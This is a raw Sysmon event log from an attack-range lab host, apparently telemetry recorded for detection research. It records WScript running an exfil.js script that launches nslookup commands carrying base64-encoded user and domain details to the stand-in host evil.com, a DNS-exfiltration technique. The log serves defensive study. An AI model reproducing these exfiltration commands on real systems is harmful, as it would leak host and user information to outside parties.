14:16:45.463{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-FC41-000000005F02}5332C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.463{2E1864BB-17CD-629A-FA41-000000005F02}49967648C:\Windows\system32\cmd.exe{2E1864BB-17CD-629A-FC41-000000005F02}5332C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.477{2E1864BB-17CD-629A-FC41-000000005F02}5332C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CD-629A-FA41-000000005F02}4996C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsocqvn.tmp 2>&1 10341000x8000000000000000204190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.426{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-FB41-000000005F02}1216C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.426{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-FB41-000000005F02}1216C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.426{2E1864BB-17CD-629A-FB41-000000005F02}12165976C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-FA41-000000005F02}4996C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.394{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-FB41-000000005F02}1216C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.394{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.394{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.394{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.394{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.394{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-FA41-000000005F02}4996C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.394{2E1864BB-17A1-629A-783D-000000005F02}55524280C:\Windows\System32\WScript.exe{2E1864BB-17CD-629A-FA41-000000005F02}4996C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.399{2E1864BB-17CD-629A-FA41-000000005F02}4996C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsocqvn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.379{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnaenk.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.341{2E1864BB-17CD-629A-F841-000000005F02}34527292C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-F941-000000005F02}3848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.341{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.341{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.341{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.341{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.341{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-F941-000000005F02}3848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.341{2E1864BB-17CD-629A-F741-000000005F02}54403776C:\Windows\system32\cmd.exe{2E1864BB-17CD-629A-F941-000000005F02}3848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.343{2E1864BB-17CD-629A-F941-000000005F02}3848C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CD-629A-F741-000000005F02}5440C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnaenk.tmp 2>&1 10341000x8000000000000000204170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.294{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-F841-000000005F02}3452C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.294{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-F841-000000005F02}3452C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.278{2E1864BB-17CD-629A-F841-000000005F02}34527292C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-F741-000000005F02}5440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.278{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-F841-000000005F02}3452C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.263{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.263{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.263{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.263{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-F741-000000005F02}5440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.261{2E1864BB-17A1-629A-783D-000000005F02}55524296C:\Windows\System32\WScript.exe{2E1864BB-17CD-629A-F741-000000005F02}5440C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 